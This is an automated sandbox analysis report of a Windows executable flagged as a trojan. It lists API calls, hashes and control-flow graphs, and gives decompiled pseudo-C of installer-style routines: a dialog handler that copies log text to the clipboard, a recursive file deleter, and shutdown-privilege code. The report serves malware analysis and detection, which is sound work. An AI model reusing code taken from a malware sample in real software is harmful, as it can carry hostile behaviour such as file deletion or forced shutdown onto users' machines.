                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                                                                                          • ExitProcess.KERNEL32 ref: 00403C1F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                          • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe" $.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Psychopharmacology$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Psychopharmacology$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                          • API String ID: 3859024572-1882968894
                                                                                                                          • Opcode ID: c37161eddd1839db3a1dd77df7f1c87030544e8cf131142df7becf6cb2043db2
                                                                                                                          • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                                                                                          • Opcode Fuzzy Hash: c37161eddd1839db3a1dd77df7f1c87030544e8cf131142df7becf6cb2043db2
                                                                                                                          • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 143 405809-405824 144 4059b3-4059ba 143->144 145 40582a-4058f1 GetDlgItem * 3 call 4045f9 call 404f52 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 4059e4-4059f1 144->147 148 4059bc-4059de GetDlgItem CreateThread CloseHandle 144->148 163 4058f3-40590d SendMessageW * 2 145->163 164 40590f-405912 145->164 149 4059f3-4059f9 147->149 150 405a0f-405a19 147->150 148->147 152 405a34-405a3d call 40462b 149->152 153 4059fb-405a0a ShowWindow * 2 call 4045f9 149->153 154 405a1b-405a21 150->154 155 405a6f-405a73 150->155 167 405a42-405a46 152->167 153->150 160 405a23-405a2f call 40459d 154->160 161 405a49-405a59 ShowWindow 154->161 155->152 158 405a75-405a7b 155->158 158->152 165 405a7d-405a90 SendMessageW 158->165 160->152 168 405a69-405a6a call 40459d 161->168 169 405a5b-405a64 call 4056ca 161->169 163->164 170 405922-405939 call 4045c4 164->170 171 405914-405920 SendMessageW 164->171 172 405b92-405b94 165->172 173 405a96-405ac1 CreatePopupMenu call 4066a5 AppendMenuW 165->173 168->155 169->168 182 40593b-40594f ShowWindow 170->182 183 40596f-405990 GetDlgItem SendMessageW 170->183 171->170 172->167 180 405ac3-405ad3 GetWindowRect 173->180 181 405ad6-405aeb TrackPopupMenu 173->181 180->181 181->172 184 405af1-405b08 181->184 185 405951-40595c ShowWindow 182->185 186 40595e 182->186 183->172 187 405996-4059ae SendMessageW * 2 183->187 188 405b0d-405b28 SendMessageW 184->188 189 405964-40596a call 4045f9 185->189 186->189 187->172 188->188 190 405b2a-405b4d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 405b4f-405b76 SendMessageW 190->192 192->192 193 405b78-405b8c GlobalUnlock SetClipboardData CloseClipboard 192->193 193->172
                                                                                                                          C-Code - Quality: 95%
                                                                                                                          			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                                                          				struct HWND__* _v8;
                                                                                                                          				long _v12;
                                                                                                                          				struct tagRECT _v28;
                                                                                                                          				void* _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				int _v44;
                                                                                                                          				int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				int _v56;
                                                                                                                          				void* _v60;
                                                                                                                          				void* _v68;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				struct HWND__* _t94;
                                                                                                                          				long _t95;
                                                                                                                          				int _t100;
                                                                                                                          				void* _t108;
                                                                                                                          				intOrPtr _t119;
                                                                                                                          				void* _t127;
                                                                                                                          				intOrPtr _t130;
                                                                                                                          				struct HWND__* _t134;
                                                                                                                          				int _t156;
                                                                                                                          				int _t159;
                                                                                                                          				struct HMENU__* _t164;
                                                                                                                          				struct HWND__* _t168;
                                                                                                                          				struct HWND__* _t169;
                                                                                                                          				int _t171;
                                                                                                                          				void* _t172;
                                                                                                                          				short* _t173;
                                                                                                                          				short* _t175;
                                                                                                                          				int _t177;
                                                                                                                          
                                                                                                                          				_t169 =  *0x429244;
                                                                                                                          				_t156 = 0;
                                                                                                                          				_v8 = _t169;
                                                                                                                          				if(_a8 != 0x110) {
                                                                                                                          					if(_a8 == 0x405) {
                                                                                                                          						_t127 = CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                                                                                          						CloseHandle(_t127); // executed
                                                                                                                          					}
                                                                                                                          					if(_a8 != 0x111) {
                                                                                                                          						L17:
                                                                                                                          						_t171 = 1;
                                                                                                                          						if(_a8 != 0x404) {
                                                                                                                          							L25:
                                                                                                                          							if(_a8 != 0x7b) {
                                                                                                                          								goto L20;
                                                                                                                          							}
                                                                                                                          							_t94 = _v8;
                                                                                                                          							if(_a12 != _t94) {
                                                                                                                          								goto L20;
                                                                                                                          							}
                                                                                                                          							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                                                                          							_a8 = _t95;
                                                                                                                          							if(_t95 <= _t156) {
                                                                                                                          								L36:
                                                                                                                          								return 0;
                                                                                                                          							}
                                                                                                                          							_t164 = CreatePopupMenu();
                                                                                                                          							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                                                                          							_t100 = _a16;
                                                                                                                          							_t159 = _a16 >> 0x10;
                                                                                                                          							if(_a16 == 0xffffffff) {
                                                                                                                          								GetWindowRect(_v8,  &_v28);
                                                                                                                          								_t100 = _v28.left;
                                                                                                                          								_t159 = _v28.top;
                                                                                                                          							}
                                                                                                                          							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                                                                                          								_v60 = _t156;
                                                                                                                          								_v48 = 0x423748;
                                                                                                                          								_v44 = 0x1000;
                                                                                                                          								_a4 = _a8;
                                                                                                                          								do {
                                                                                                                          									_a4 = _a4 - 1;
                                                                                                                          									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                                                                                          								} while (_a4 != _t156);
                                                                                                                          								OpenClipboard(_t156);
                                                                                                                          								EmptyClipboard();
                                                                                                                          								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                                                                          								_a4 = _t108;
                                                                                                                          								_t172 = GlobalLock(_t108);
                                                                                                                          								do {
                                                                                                                          									_v48 = _t172;
                                                                                                                          									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                                                                          									 *_t173 = 0xd;
                                                                                                                          									_t175 = _t173 + 2;
                                                                                                                          									 *_t175 = 0xa;
                                                                                                                          									_t172 = _t175 + 2;
                                                                                                                          									_t156 = _t156 + 1;
                                                                                                                          								} while (_t156 < _a8);
                                                                                                                          								GlobalUnlock(_a4);
                                                                                                                          								SetClipboardData(0xd, _a4);
                                                                                                                          								CloseClipboard();
                                                                                                                          							}
                                                                                                                          							goto L36;
                                                                                                                          						}
                                                                                                                          						if( *0x42922c == _t156) {
                                                                                                                          							ShowWindow( *0x42a268, 8); // executed
                                                                                                                          							if( *0x42a2ec == _t156) {
                                                                                                                          								_t119 =  *0x422720; // 0x83cdcc
                                                                                                                          								_t57 = _t119 + 0x34; // 0xffffffd5
                                                                                                                          								E004056CA( *_t57, _t156);
                                                                                                                          							}
                                                                                                                          							E0040459D(_t171);
                                                                                                                          							goto L25;
                                                                                                                          						}
                                                                                                                          						 *0x421f18 = 2;
                                                                                                                          						E0040459D(0x78);
                                                                                                                          						goto L20;
                                                                                                                          					} else {
                                                                                                                          						if(_a12 != 0x403) {
                                                                                                                          							L20:
                                                                                                                          							return E0040462B(_a8, _a12, _a16);
                                                                                                                          						}
                                                                                                                          						ShowWindow( *0x429230, _t156);
                                                                                                                          						ShowWindow(_t169, 8);
                                                                                                                          						E004045F9(_t169);
                                                                                                                          						goto L17;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_v52 = _v52 | 0xffffffff;
                                                                                                                          				_v40 = _v40 | 0xffffffff;
                                                                                                                          				_t177 = 2;
                                                                                                                          				_v60 = _t177;
                                                                                                                          				_v56 = 0;
                                                                                                                          				_v48 = 0;
                                                                                                                          				_v44 = 0;
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				_t130 =  *0x42a270;
                                                                                                                          				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                                                                          				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                                                                          				 *0x429230 = GetDlgItem(_a4, 0x403);
                                                                                                                          				 *0x429228 = GetDlgItem(_a4, 0x3ee);
                                                                                                                          				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                                                                          				 *0x429244 = _t134;
                                                                                                                          				_v8 = _t134;
                                                                                                                          				E004045F9( *0x429230);
                                                                                                                          				 *0x429234 = E00404F52(4);
                                                                                                                          				 *0x42924c = 0;
                                                                                                                          				GetClientRect(_v8,  &_v28);
                                                                                                                          				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                                                                          				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                                                                                          				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                                                                                          				if(_a8 >= 0) {
                                                                                                                          					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                                                                          					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                                                                          				}
                                                                                                                          				if(_a12 >= _t156) {
                                                                                                                          					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                                                                          				}
                                                                                                                          				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                          				_push(0x1b);
                                                                                                                          				E004045C4(_a4);
                                                                                                                          				if(( *0x42a278 & 0x00000003) != 0) {
                                                                                                                          					ShowWindow( *0x429230, _t156); // executed
                                                                                                                          					if(( *0x42a278 & 0x00000002) != 0) {
                                                                                                                          						 *0x429230 = _t156;
                                                                                                                          					} else {
                                                                                                                          						ShowWindow(_v8, 8);
                                                                                                                          					}
                                                                                                                          					E004045F9( *0x429228);
                                                                                                                          				}
                                                                                                                          				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                                                                          				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                                                                          				if(( *0x42a278 & 0x00000004) != 0) {
                                                                                                                          					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                                                                          					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                                                                          				}
                                                                                                                          				goto L36;
                                                                                                                          			}



































                                                                                                                          0x00405811
                                                                                                                          0x00405817
                                                                                                                          0x00405821
                                                                                                                          0x00405824
                                                                                                                          0x004059ba
                                                                                                                          0x004059d7
                                                                                                                          0x004059de
                                                                                                                          0x004059de
                                                                                                                          0x004059f1
                                                                                                                          0x00405a0f
                                                                                                                          0x00405a11
                                                                                                                          0x00405a19
                                                                                                                          0x00405a6f
                                                                                                                          0x00405a73
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405a75
                                                                                                                          0x00405a7b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405a85
                                                                                                                          0x00405a8d
                                                                                                                          0x00405a90
                                                                                                                          0x00405b92
                                                                                                                          0x00000000
                                                                                                                          0x00405b92
                                                                                                                          0x00405a9f
                                                                                                                          0x00405aaa
                                                                                                                          0x00405ab3
                                                                                                                          0x00405abe
                                                                                                                          0x00405ac1
                                                                                                                          0x00405aca
                                                                                                                          0x00405ad0
                                                                                                                          0x00405ad3
                                                                                                                          0x00405ad3
                                                                                                                          0x00405aeb
                                                                                                                          0x00405af4
                                                                                                                          0x00405af7
                                                                                                                          0x00405afe
                                                                                                                          0x00405b05
                                                                                                                          0x00405b0d
                                                                                                                          0x00405b0d
                                                                                                                          0x00405b24
                                                                                                                          0x00405b24
                                                                                                                          0x00405b2b
                                                                                                                          0x00405b31
                                                                                                                          0x00405b3d
                                                                                                                          0x00405b44
                                                                                                                          0x00405b4d
                                                                                                                          0x00405b4f
                                                                                                                          0x00405b52
                                                                                                                          0x00405b61
                                                                                                                          0x00405b64
                                                                                                                          0x00405b6a
                                                                                                                          0x00405b6b
                                                                                                                          0x00405b71
                                                                                                                          0x00405b72
                                                                                                                          0x00405b73
                                                                                                                          0x00405b7b
                                                                                                                          0x00405b86
                                                                                                                          0x00405b8c
                                                                                                                          0x00405b8c
                                                                                                                          0x00000000
                                                                                                                          0x00405aeb
                                                                                                                          0x00405a21
                                                                                                                          0x00405a51
                                                                                                                          0x00405a59
                                                                                                                          0x00405a5b
                                                                                                                          0x00405a61
                                                                                                                          0x00405a64
                                                                                                                          0x00405a64
                                                                                                                          0x00405a6a
                                                                                                                          0x00000000
                                                                                                                          0x00405a6a
                                                                                                                          0x00405a25
                                                                                                                          0x00405a2f
                                                                                                                          0x00000000
                                                                                                                          0x004059f3
                                                                                                                          0x004059f9
                                                                                                                          0x00405a34
                                                                                                                          0x00000000
                                                                                                                          0x00405a3d
                                                                                                                          0x00405a02
                                                                                                                          0x00405a07
                                                                                                                          0x00405a0a
                                                                                                                          0x00000000
                                                                                                                          0x00405a0a
                                                                                                                          0x004059f1
                                                                                                                          0x0040582a
                                                                                                                          0x0040582e
                                                                                                                          0x00405836
                                                                                                                          0x0040583a
                                                                                                                          0x0040583d
                                                                                                                          0x00405840
                                                                                                                          0x00405843
                                                                                                                          0x00405846
                                                                                                                          0x00405847
                                                                                                                          0x00405848
                                                                                                                          0x00405861
                                                                                                                          0x00405864
                                                                                                                          0x0040586e
                                                                                                                          0x0040587d
                                                                                                                          0x00405885
                                                                                                                          0x0040588d
                                                                                                                          0x00405892
                                                                                                                          0x00405895
                                                                                                                          0x004058a1
                                                                                                                          0x004058aa
                                                                                                                          0x004058b3
                                                                                                                          0x004058d5
                                                                                                                          0x004058db
                                                                                                                          0x004058ec
                                                                                                                          0x004058f1
                                                                                                                          0x004058ff
                                                                                                                          0x0040590d
                                                                                                                          0x0040590d
                                                                                                                          0x00405912
                                                                                                                          0x00405920
                                                                                                                          0x00405920
                                                                                                                          0x00405925
                                                                                                                          0x00405928
                                                                                                                          0x0040592d
                                                                                                                          0x00405939
                                                                                                                          0x00405942
                                                                                                                          0x0040594f
                                                                                                                          0x0040595e
                                                                                                                          0x00405951
                                                                                                                          0x00405956
                                                                                                                          0x00405956
                                                                                                                          0x0040596a
                                                                                                                          0x0040596a
                                                                                                                          0x0040597e
                                                                                                                          0x00405987
                                                                                                                          0x00405990
                                                                                                                          0x004059a0
                                                                                                                          0x004059ac
                                                                                                                          0x004059ac
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 00405867
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405876
                                                                                                                          • GetClientRect.USER32(?,?), ref: 004058B3
                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 004058BA
                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405956
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405977
                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405885
                                                                                                                            • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004059C9
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 004059DE
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405A02
                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                                                                                          • ShowWindow.USER32(00000008), ref: 00405A51
                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                                                                                          • CreatePopupMenu.USER32 ref: 00405A96
                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AAA
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00405ACA
                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                                                                                          • EmptyClipboard.USER32 ref: 00405B31
                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405B47
                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
                                                                                                                          • CloseClipboard.USER32 ref: 00405B8C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                          • String ID: H7B${
                                                                                                                          • API String ID: 590372296-2256286769
                                                                                                                          • Opcode ID: 153ff5dc364a6c7c2e50f1b489f7107bf33a64f1d0900c26a8f10ec1720b826b
                                                                                                                          • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                                                                                          • Opcode Fuzzy Hash: 153ff5dc364a6c7c2e50f1b489f7107bf33a64f1d0900c26a8f10ec1720b826b
                                                                                                                          • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 506 405d74-405d9a call 40603f 509 405db3-405dba 506->509 510 405d9c-405dae DeleteFileW 506->510 512 405dbc-405dbe 509->512 513 405dcd-405ddd call 406668 509->513 511 405f30-405f34 510->511 514 405dc4-405dc7 512->514 515 405ede-405ee3 512->515 519 405dec-405ded call 405f83 513->519 520 405ddf-405dea lstrcatW 513->520 514->513 514->515 515->511 518 405ee5-405ee8 515->518 521 405ef2-405efa call 40699e 518->521 522 405eea-405ef0 518->522 523 405df2-405df6 519->523 520->523 521->511 530 405efc-405f10 call 405f37 call 405d2c 521->530 522->511 526 405e02-405e08 lstrcatW 523->526 527 405df8-405e00 523->527 529 405e0d-405e29 lstrlenW FindFirstFileW 526->529 527->526 527->529 532 405ed3-405ed7 529->532 533 405e2f-405e37 529->533 546 405f12-405f15 530->546 547 405f28-405f2b call 4056ca 530->547 532->515 535 405ed9 532->535 536 405e57-405e6b call 406668 533->536 537 405e39-405e41 533->537 535->515 548 405e82-405e8d call 405d2c 536->548 549 405e6d-405e75 536->549 538 405e43-405e4b 537->538 539 405eb6-405ec6 FindNextFileW 537->539 538->536 542 405e4d-405e55 538->542 539->533 545 405ecc-405ecd FindClose 539->545 542->536 542->539 545->532 546->522 550 405f17-405f26 call 4056ca call 406428 546->550 547->511 559 405eae-405eb1 call 4056ca 548->559 560 405e8f-405e92 548->560 549->539 551 405e77-405e80 call 405d74 549->551 550->511 551->539 559->539 563 405e94-405ea4 call 4056ca call 406428 560->563 564 405ea6-405eac 560->564 563->539 564->539
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				short _v556;
                                                                                                                          				short _v558;
                                                                                                                          				struct _WIN32_FIND_DATAW _v604;
                                                                                                                          				signed int _t38;
                                                                                                                          				signed int _t52;
                                                                                                                          				signed int _t55;
                                                                                                                          				signed int _t62;
                                                                                                                          				void* _t64;
                                                                                                                          				signed char _t65;
                                                                                                                          				WCHAR* _t66;
                                                                                                                          				void* _t67;
                                                                                                                          				WCHAR* _t68;
                                                                                                                          				void* _t70;
                                                                                                                          
                                                                                                                          				_t65 = _a8;
                                                                                                                          				_t68 = _a4;
                                                                                                                          				_v8 = _t65 & 0x00000004;
                                                                                                                          				_t38 = E0040603F(__eflags, _t68);
                                                                                                                          				_v12 = _t38;
                                                                                                                          				if((_t65 & 0x00000008) != 0) {
                                                                                                                          					_t62 = DeleteFileW(_t68); // executed
                                                                                                                          					asm("sbb eax, eax");
                                                                                                                          					_t64 =  ~_t62 + 1;
                                                                                                                          					 *0x42a2e8 =  *0x42a2e8 + _t64;
                                                                                                                          					return _t64;
                                                                                                                          				}
                                                                                                                          				_a4 = _t65;
                                                                                                                          				_t8 =  &_a4;
                                                                                                                          				 *_t8 = _a4 & 0x00000001;
                                                                                                                          				__eflags =  *_t8;
                                                                                                                          				if( *_t8 == 0) {
                                                                                                                          					L5:
                                                                                                                          					E00406668(0x425750, _t68);
                                                                                                                          					__eflags = _a4;
                                                                                                                          					if(_a4 == 0) {
                                                                                                                          						E00405F83(_t68);
                                                                                                                          					} else {
                                                                                                                          						lstrcatW(0x425750, L"\\*.*");
                                                                                                                          					}
                                                                                                                          					__eflags =  *_t68;
                                                                                                                          					if( *_t68 != 0) {
                                                                                                                          						L10:
                                                                                                                          						lstrcatW(_t68, 0x40a014);
                                                                                                                          						L11:
                                                                                                                          						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                                                                          						_t38 = FindFirstFileW(0x425750,  &_v604);
                                                                                                                          						_t70 = _t38;
                                                                                                                          						__eflags = _t70 - 0xffffffff;
                                                                                                                          						if(_t70 == 0xffffffff) {
                                                                                                                          							L26:
                                                                                                                          							__eflags = _a4;
                                                                                                                          							if(_a4 != 0) {
                                                                                                                          								_t30 = _t66 - 2;
                                                                                                                          								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                                                                          								__eflags =  *_t30;
                                                                                                                          							}
                                                                                                                          							goto L28;
                                                                                                                          						} else {
                                                                                                                          							goto L12;
                                                                                                                          						}
                                                                                                                          						do {
                                                                                                                          							L12:
                                                                                                                          							__eflags = _v604.cFileName - 0x2e;
                                                                                                                          							if(_v604.cFileName != 0x2e) {
                                                                                                                          								L16:
                                                                                                                          								E00406668(_t66,  &(_v604.cFileName));
                                                                                                                          								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                                                                          								if(__eflags == 0) {
                                                                                                                          									_t52 = E00405D2C(__eflags, _t68, _v8);
                                                                                                                          									__eflags = _t52;
                                                                                                                          									if(_t52 != 0) {
                                                                                                                          										E004056CA(0xfffffff2, _t68);
                                                                                                                          									} else {
                                                                                                                          										__eflags = _v8 - _t52;
                                                                                                                          										if(_v8 == _t52) {
                                                                                                                          											 *0x42a2e8 =  *0x42a2e8 + 1;
                                                                                                                          										} else {
                                                                                                                          											E004056CA(0xfffffff1, _t68);
                                                                                                                          											E00406428(_t67, _t68, 0);
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									__eflags = (_a8 & 0x00000003) - 3;
                                                                                                                          									if(__eflags == 0) {
                                                                                                                          										E00405D74(__eflags, _t68, _a8);
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								goto L24;
                                                                                                                          							}
                                                                                                                          							__eflags = _v558;
                                                                                                                          							if(_v558 == 0) {
                                                                                                                          								goto L24;
                                                                                                                          							}
                                                                                                                          							__eflags = _v558 - 0x2e;
                                                                                                                          							if(_v558 != 0x2e) {
                                                                                                                          								goto L16;
                                                                                                                          							}
                                                                                                                          							__eflags = _v556;
                                                                                                                          							if(_v556 == 0) {
                                                                                                                          								goto L24;
                                                                                                                          							}
                                                                                                                          							goto L16;
                                                                                                                          							L24:
                                                                                                                          							_t55 = FindNextFileW(_t70,  &_v604);
                                                                                                                          							__eflags = _t55;
                                                                                                                          						} while (_t55 != 0);
                                                                                                                          						_t38 = FindClose(_t70);
                                                                                                                          						goto L26;
                                                                                                                          					}
                                                                                                                          					__eflags =  *0x425750 - 0x5c;
                                                                                                                          					if( *0x425750 != 0x5c) {
                                                                                                                          						goto L11;
                                                                                                                          					}
                                                                                                                          					goto L10;
                                                                                                                          				} else {
                                                                                                                          					__eflags = _t38;
                                                                                                                          					if(_t38 == 0) {
                                                                                                                          						L28:
                                                                                                                          						__eflags = _a4;
                                                                                                                          						if(_a4 == 0) {
                                                                                                                          							L36:
                                                                                                                          							return _t38;
                                                                                                                          						}
                                                                                                                          						__eflags = _v12;
                                                                                                                          						if(_v12 != 0) {
                                                                                                                          							_t38 = E0040699E(_t68);
                                                                                                                          							__eflags = _t38;
                                                                                                                          							if(_t38 == 0) {
                                                                                                                          								goto L36;
                                                                                                                          							}
                                                                                                                          							E00405F37(_t68);
                                                                                                                          							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
                                                                                                                          							__eflags = _t38;
                                                                                                                          							if(_t38 != 0) {
                                                                                                                          								return E004056CA(0xffffffe5, _t68);
                                                                                                                          							}
                                                                                                                          							__eflags = _v8;
                                                                                                                          							if(_v8 == 0) {
                                                                                                                          								goto L30;
                                                                                                                          							}
                                                                                                                          							E004056CA(0xfffffff1, _t68);
                                                                                                                          							return E00406428(_t67, _t68, 0);
                                                                                                                          						}
                                                                                                                          						L30:
                                                                                                                          						 *0x42a2e8 =  *0x42a2e8 + 1;
                                                                                                                          						return _t38;
                                                                                                                          					}
                                                                                                                          					__eflags = _t65 & 0x00000002;
                                                                                                                          					if((_t65 & 0x00000002) == 0) {
                                                                                                                          						goto L28;
                                                                                                                          					}
                                                                                                                          					goto L5;
                                                                                                                          				}
                                                                                                                          			}


















                                                                                                                          0x00405d7e
                                                                                                                          0x00405d83
                                                                                                                          0x00405d8c
                                                                                                                          0x00405d8f
                                                                                                                          0x00405d97
                                                                                                                          0x00405d9a
                                                                                                                          0x00405d9d
